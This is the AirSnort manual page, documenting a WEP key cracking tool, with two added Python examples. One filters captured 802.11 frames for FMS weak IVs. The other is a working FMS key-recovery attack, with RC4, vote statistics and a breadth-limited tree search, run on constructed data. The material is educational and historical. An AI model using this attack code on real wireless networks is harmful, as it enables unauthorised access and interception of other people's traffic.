AIRSNORT(1)               BSD General Commands Manual              AIRSNORT(1)


NAME

     airsnort — WEP key cracking tool


SYNOPSIS

     airsnort


DESCRIPTION

     airsnort is a WEP key cracking tool designed to exploit the RC4 key
     scheduling weakness described by Fluhrer, Mantin, and Shamir (FMS) and
     first exploited in practice by Stubblefield et al.

     - Running AirSnort

     Once launched, airsnort must be configured for your wireless NIC and for
     the kind of crack attempts you want it to make.  To capture packets,
     first enter the name of your wireless network device in the "Network
     device" field.  This will be something like "wlanX" for cards that use
     the wlan-ng drivers and "ethX" for other cards.  Next select the type of
     card you are using in the "Card type" drop-down box.  The available
     choices are Prism2, Orinoco, and other; Cisco cards fall into the other
     category.  The purpose of this field is primarily to tell airsnort how
     to place your NIC into monitor mode.  In monitor mode a wireless NIC
     gathers all packets indiscriminately, and no association with an access
     point is required.  For wlan-ng and orinoco_cs based NICs, monitor mode
     is entered automatically when the 'Start' button is clicked to begin a
     capture session.  Other card types must be put into monitor mode outside
     of airsnort, before Start is clicked.

     Choose between "scan" mode, which cycles through all 11 802.11b channels
     at a regular interval, and "channel" mode, which monitors a single
     channel.  Note that in either case it is quite possible to receive
     packets that bleed through from neighboring channels.

     - Capture Details

     Capture uses the pcap library to receive monitor mode packets.  The
     packets pass through two filters.  First, unencrypted packets are
     filtered out.  Then, among the encrypted packets, useless ones (those
     without a weak IV) are discarded.  All non-data packets are discarded,
     with the exception of 802.11b Beacon and Probe Response frames, which
     are examined in order to obtain access point SSID data.

     To distinguish encrypted from unencrypted packets, capture examines the
     first two bytes of the frame body.  An unencrypted data frame begins
     with an LLC/SNAP header whose first two bytes are 0xAA 0xAA, so every
     frame body that starts with 0xAAAA is dropped.  (An encrypted frame
     whose three-byte IV happens to begin with those bytes is lost to this
     test as well; the Protected Frame bit in the 802.11 frame control field
     is the authoritative indicator.)

     For a description of what constitutes an interesting packet, refer to
     the FMS paper and its discussion of "weak IVs".

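     The two capture filters and the SSID extraction described above, as an
     added example in Python (this is not AirSnort's code; airsnort itself is
     a C program).  The example classifies raw 802.11 frames the way the
     text describes, but it tests the Protected Frame bit rather than the
     0xAAAA heuristic, and the 13-byte key length, the FMS weak IV form
     (B+3, 255, X), the sample MAC addresses and the four constructed frames
     are assumptions of the example, not data from airsnort.

```python
"""Capture-side filtering of monitor-mode frames (added example, not AirSnort's code)."""
from collections import defaultdict

HDR_LEN = 24                  # FC(2) Duration(2) Addr1(6) Addr2(6) Addr3(6) SeqCtl(2); no QoS/4-address frames
TYPE_MGMT, TYPE_DATA = 0, 2
SUBTYPE_PROBE_RESP, SUBTYPE_BEACON = 5, 8
FLAG_TO_DS, FLAG_FROM_DS, FLAG_PROTECTED = 0x01, 0x02, 0x40
KEY_BYTES = 13                # 128 bit WEP has 13 secret key bytes, so weak IVs have iv[0] in 3..15


def is_weak_iv(iv):
    """FMS weak IV of the form (B+3, 255, X), B being a secret key byte index."""
    return iv[1] == 0xFF and 3 <= iv[0] < 3 + KEY_BYTES


def parse_frame(frame):
    """Classify one raw 802.11 frame (FCS stripped) as (bssid, kind, detail)."""
    if len(frame) < HDR_LEN:
        return None, "other", None
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    body = frame[HDR_LEN:]
    if ftype == TYPE_MGMT and subtype in (SUBTYPE_BEACON, SUBTYPE_PROBE_RESP):
        # Fixed fields timestamp(8) interval(2) capability(2), then elements as (id, len, data).
        pos = 12
        while pos + 2 <= len(body):
            ie_id, ie_len = body[pos], body[pos + 1]
            if ie_id == 0:                                      # SSID element
                return a3, "ssid", body[pos + 2:pos + 2 + ie_len].decode("utf-8", "replace")
            pos += 2 + ie_len
        return a3, "ssid", ""
    if ftype != TYPE_DATA:
        return None, "other", None                              # control frames, other management
    to_ds, from_ds = fc1 & FLAG_TO_DS, fc1 & FLAG_FROM_DS
    bssid = a1 if to_ds and not from_ds else a2 if from_ds and not to_ds else a3
    # airsnort drops bodies starting with the LLC/SNAP bytes AA AA; the Protected Frame bit
    # gives the same answer without misfiring on a WEP IV that happens to begin AA AA.
    if not (fc1 & FLAG_PROTECTED):
        return bssid, "plaintext", None
    iv = body[:3]                                               # WEP body: IV(3) key id(1) data ICV
    return bssid, "weak" if is_weak_iv(iv) else "encrypted", iv


def summarize(frames):
    """Per-BSSID tallies like the capture display: packets, encrypted, interesting, SSID."""
    stats = defaultdict(lambda: {"ssid": None, "packets": 0, "encrypted": 0, "interesting": 0})
    for frame in frames:
        bssid, kind, detail = parse_frame(frame)
        if bssid is None:
            continue
        ap = stats[bssid.hex(":")]
        if kind == "ssid":
            ap["ssid"] = detail
            continue
        ap["packets"] += 1
        if kind != "plaintext":
            ap["encrypted"] += 1
        if kind == "weak":
            ap["interesting"] += 1
    return dict(stats)


def mk_frame(ftype, subtype, flags, a1, a2, a3, body):
    """Build a minimal 802.11 frame; duration and sequence control are zero."""
    return bytes([(ftype << 2) | (subtype << 4), flags]) + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00" + body


AP, STA, BCAST = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"), b"\xff" * 6


def sample_capture():
    """Constructed frames: a beacon, a cleartext data frame, a weak-IV WEP frame, an ordinary WEP frame."""
    beacon_body = b"\x00" * 8 + b"\x64\x00" + b"\x11\x00" + b"\x00\x04demo"
    return [
        mk_frame(TYPE_MGMT, SUBTYPE_BEACON, 0x00, BCAST, AP, AP, beacon_body),
        mk_frame(TYPE_DATA, 0, FLAG_TO_DS, AP, STA, BCAST, bytes.fromhex("aaaa030000000800") + b"clear"),
        mk_frame(TYPE_DATA, 0, FLAG_TO_DS | FLAG_PROTECTED, AP, STA, BCAST, bytes([0x05, 0xFF, 0x3C, 0x00]) + b"\x9b" * 40),
        mk_frame(TYPE_DATA, 0, FLAG_FROM_DS | FLAG_PROTECTED, STA, AP, BCAST, bytes([0x12, 0x34, 0x56, 0x00]) + b"\x7e" * 40),
    ]


if __name__ == "__main__":
    for bssid, ap in summarize(sample_capture()).items():
        print(bssid, ap)
```

     Fed the four constructed frames, the summary for the one BSSID reports
     three data packets, two of them encrypted and one of them interesting,
     with the SSID taken from the beacon.  Frames read from a pcap dump with
     link type IEEE802_11 can be passed to summarize() the same way.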
     - Cracking Details

     Cracking attempts are made in parallel with packet capture.  Currently
     the cracker attempts both a 40 bit and a 128 bit key each time 10 new
     weak IVs have been seen for a given access point.  Airsnort uses a
     probabilistic attack, so the best guess may not be the right one; with
     limited captured data and enough CPU power you can perform more
     exhaustive searches.  The search for a key is a depth-first traversal
     of an n-ary tree.  The depth of the tree is 5 for 40 bit key attempts
     (5 secret key bytes) and 13 for 128 bit key attempts (13 secret key
     bytes).  The breadth of the tree is governed by the 40 and 128 bit
     crack depth fields in the airsnort GUI: a breadth parameter of 'n'
     instructs airsnort to try the n most likely values at each key
     position, ranked by statistics derived from the weak IVs collected so
     far.  Large breadth settings can make crack attempts very slow, so the
     default values of 3 for 40 bit cracks and 2 for 128 bit cracks are
     recommended for starters.  If a large number of weak IVs has been
     gathered (more than 1500 if a 40 bit key is suspected, more than 3000
     if a 128 bit key is suspected), you may want to try increasing the
     breadth values.

     The number of interesting packets needed for a successful crack depends
     on two things: luck and key length.  Assuming luck is on your side, the
     key length is the only factor that matters.  For a 128 bit key this
     translates to about 1500 packets; for other key lengths assume roughly
     115 weak-IV packets per byte of the secret key.  Some keys are more
     resistant to this technique than others and may require far more
     packets.  If you have a lot of packets and no key, either wait for more
     packets or try a larger breadth.

     In any case, when the cracker believes it has found the key, it checks
     the result by decrypting a randomly chosen captured packet and verifying
     its CRC-32 integrity check value (ICV).  If the check succeeds, the key
     is printed in both ASCII and hex, and the successful crack is indicated
     by an 'X' in the leftmost column of the display.

     The cracker performs a partial key search over the data collected so
     far.  Because the attack is statistical, the best-ranked guess is not
     always correct, so with limited captured data and enough CPU power you
     can search more exhaustively: raising the breadth parameter makes the
     cracker also try "worse" guesses at each key position.  Specifying a
     breadth of more than three or four is not recommended.

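     The tree search, the per-position vote statistics and the ICV check of
     the preceding paragraphs, carried through as an added Python example
     (this is not AirSnort's code).  It recovers a constructed 40 bit key
     from a constructed capture in which every weak IV of the FMS form
     (B+3, 255, X) is present once for each of the five key bytes, using the
     depth-first search with breadth 3 that the text recommends for 40 bit
     keys.  The key, the payload, the vote rule (the "resolved condition"
     and the inversion from the FMS paper) and the verification against the
     first packet are assumptions of the example, not details of airsnort.

```python
"""FMS key recovery with a breadth-limited depth-first search (added example, not AirSnort's code)."""
import zlib
from collections import Counter

SNAP0 = 0xAA  # first plaintext byte of every LLC/SNAP data frame, so keystream[0] = ct[0] ^ 0xAA


def ksa(key):
    """RC4 key scheduling; for WEP the key is IV || secret."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4(key, data):
    """RC4 encrypt/decrypt (both are the same XOR with the keystream)."""
    S = ksa(key)
    i = j = 0
    out = bytearray()
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret, iv, plaintext):
    """WEP frame body: IV(3) | key id(1) | RC4(IV || secret)(plaintext || CRC-32 ICV)."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + b"\x00" + rc4(iv + secret, plaintext + icv)


def wep_check_icv(secret, body):
    """The check airsnort makes on a candidate key: decrypt one packet and verify its ICV."""
    pt = rc4(body[:3] + secret, body[4:])
    return zlib.crc32(pt[:-4]).to_bytes(4, "little") == pt[-4:]


def is_weak_iv(iv, key_len):
    """FMS weak form (B+3, 255, X) for a secret key byte index B < key_len."""
    return iv[1] == 0xFF and 3 <= iv[0] < key_len + 3


def fms_vote(iv, ks0, known):
    """One weak IV's vote for secret byte len(known), or None if the IV does not resolve."""
    B = len(known)
    K = list(iv) + list(known)           # the B+3 key bytes the KSA consumes first
    S = list(range(256))
    j = 0
    for i in range(B + 3):               # run the KSA as far as the known bytes allow
        j = (j + S[i] + K[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    # Resolved condition from the FMS paper: S[1] and S[S[1]] already point at position B+3.
    if S[1] >= B + 3 or (S[1] + S[S[1]]) & 0xFF != B + 3:
        return None
    # With roughly 5% probability those positions are left alone afterwards and
    # keystream[0] = S[j'] with j' = j + S[B+3] + K[B+3]; invert that for K[B+3].
    return (S.index(ks0) - j - S[B + 3]) & 0xFF


def crack(bodies, key_len, breadth):
    """Depth-first search: at each key position try the 'breadth' most-voted bytes."""
    by_pos = {}
    for body in bodies:
        iv = body[:3]
        if is_weak_iv(iv, key_len):
            by_pos.setdefault(iv[0] - 3, []).append((iv, body[4] ^ SNAP0))

    def search(known):
        if len(known) == key_len:        # leaf: confirm the candidate against one packet's ICV
            key = bytes(known)
            return key if wep_check_icv(key, bodies[0]) else None
        votes = Counter()
        for iv, ks0 in by_pos.get(len(known), []):
            guess = fms_vote(iv, ks0, known)
            if guess is not None:
                votes[guess] += 1
        for cand, _ in votes.most_common(breadth):
            found = search(known + [cand])
            if found is not None:
                return found
        return None

    return search([])


def build_capture(secret):
    """Constructed capture: every weak IV (B+3, 255, X) for each key byte, same LLC/SNAP payload."""
    payload = bytes.fromhex("aaaa030000000800") + b"demo payload for the FMS example"
    return [wep_encrypt(secret, bytes([B + 3, 0xFF, x]), payload)
            for B in range(len(secret)) for x in range(256)]


if __name__ == "__main__":
    secret = bytes.fromhex("0badc0ffee")   # constructed 40 bit key (5 secret bytes)
    found = crack(build_capture(secret), key_len=5, breadth=3)
    print("recovered", found.hex() if found else "nothing")
```

     A 128 bit attempt is the same call with key_len=13 and a breadth of 2,
     which is why the text warns about the cost of large breadth values: the
     worst case visits breadth**13 leaves, each costing a full RC4 key
     schedule for the ICV check.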
     - Save and Restore

     Airsnort saves data in two formats.  All packets captured by airsnort
     can be saved in pcap dump file format by selecting the "Log to file"
     option from the File menu.  This must be done before a capture session
     is started.  Airsnort can also save a much smaller amount of data about
     a capture session in the form of "crack" files.  These files hold the
     minimum amount of data that airsnort maintains for each access point it
     discovers: summary data about those packets it has seen that actually
     use weak IVs.  Airsnort always asks the user to save data to a crack
     file when the program is terminated.  By using save files, an airsnort
     session can effectively be paused and resumed later by first loading
     the save file and then starting a capture session.  Restoring data from
     a pcap dump file amounts to replaying the entire capture session from
     which the dump was created, so all statistics will reflect what was
     seen during the live session.  Restoring data from a crack file only
     shows statistics about packets that use weak IVs, so packet counts are
     likely to be much smaller than during the live capture.  It is possible
     to load a pcap dump file and create a corresponding crack file in order
     to reduce the amount of stored data.


SEE ALSO

     gencases(1) decrypt(1)


AUTHORS

     Jeremy Bruestle <melvin@melvin.net>
     Blake Hegerle <blake@melvin.net>
     Snax <snax@shmoo.com>

Linux                           August 18, 2002                          Linux